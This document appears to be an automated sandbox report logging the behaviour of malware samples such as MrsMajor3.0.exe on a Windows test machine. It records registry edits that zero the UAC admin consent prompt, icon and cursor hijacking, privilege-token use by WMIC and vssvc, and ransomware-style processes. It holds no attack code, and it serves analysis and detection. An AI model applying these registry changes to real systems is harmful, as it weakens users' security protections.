| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Cursors\Hand = "C:\\Program Files\\MicrosoftWindowsServicesEtc\\data\\excursor.ani" | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Cursors | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Cursors\Arrow = "C:\\Program Files\\MicrosoftWindowsServicesEtc\\data\\excursor.ani" | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Cursors\AppStarting = "C:\\Program Files\\MicrosoftWindowsServicesEtc\\data\\excursor.ani" | C:\Windows\system32\wscript.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "59" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | C:\Windows\system32\LogonUI.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mp3file\DefaultIcon | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mp3file\DefaultIcon\ = "C:\\Program Files\\MicrosoftWindowsServicesEtc\\data\\fileico.ico" | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mp4file | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\DefaultIcon | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\DefaultIcon\ = "C:\\Program Files\\MicrosoftWindowsServicesEtc\\data\\fileico.ico" | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\Downloads\tor-browser-windows-x86_64-portable-13.5.6.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mp4file\DefaultIcon | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mp4file\DefaultIcon\ = "C:\\Program Files\\MicrosoftWindowsServicesEtc\\data\\fileico.ico" | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon\ = "C:\\Program Files\\MicrosoftWindowsServicesEtc\\data\\fileico.ico" | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Program Files\\MicrosoftWindowsServicesEtc\\data\\fileico.ico" | C:\Windows\system32\wscript.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 698910.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 797660.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 786670.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 453209.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\@[email protected] | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\57EA.tmp\eulascr.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Users\Admin\Desktop\taskse.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Users\Admin\Desktop\taskse.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Users\Admin\Desktop\taskse.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Users\Admin\Desktop\taskse.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Users\Admin\Desktop\taskse.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Users\Admin\Desktop\taskse.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Users\Admin\Desktop\taskse.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Users\Admin\Desktop\taskse.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Users\Admin\Desktop\taskse.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Users\Admin\Desktop\taskse.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Users\Admin\Desktop\taskse.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Users\Admin\Desktop\taskse.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Users\Admin\Desktop\taskse.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Users\Admin\Desktop\taskse.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Users\Admin\Desktop\taskse.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\system32\wscript.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\system32\wscript.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | C:\Windows\system32\wscript.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | C:\Windows\system32\wscript.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\system32\wscript.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system | C:\Windows\system32\wscript.exe | N/A |
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://github.com
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc69ee46f8,0x7ffc69ee4708,0x7ffc69ee4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2776 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3180 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4772 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5400 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5400 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5472 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5916 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5472 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3512 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5604 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6072 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6088 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6188 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6372 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6616 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5972 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5604 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5988 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5960 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6228 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6024 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Downloads\MrsMajor3.0.exe
"C:\Users\Admin\Downloads\MrsMajor3.0.exe"
C:\Windows\system32\wscript.exe
"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\555.tmp\556.tmp\557.vbs //Nologo
C:\Users\Admin\AppData\Local\Temp\555.tmp\eulascr.exe
"C:\Users\Admin\AppData\Local\Temp\555.tmp\eulascr.exe"
C:\Users\Admin\Downloads\MrsMajor3.0.exe
"C:\Users\Admin\Downloads\MrsMajor3.0.exe"
C:\Windows\system32\wscript.exe
"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\1EF8.tmp\1EF9.tmp\1EFA.vbs //Nologo
C:\Users\Admin\AppData\Local\Temp\1EF8.tmp\eulascr.exe
"C:\Users\Admin\AppData\Local\Temp\1EF8.tmp\eulascr.exe"
C:\Users\Admin\Downloads\MrsMajor3.0.exe
"C:\Users\Admin\Downloads\MrsMajor3.0.exe"
C:\Windows\system32\wscript.exe
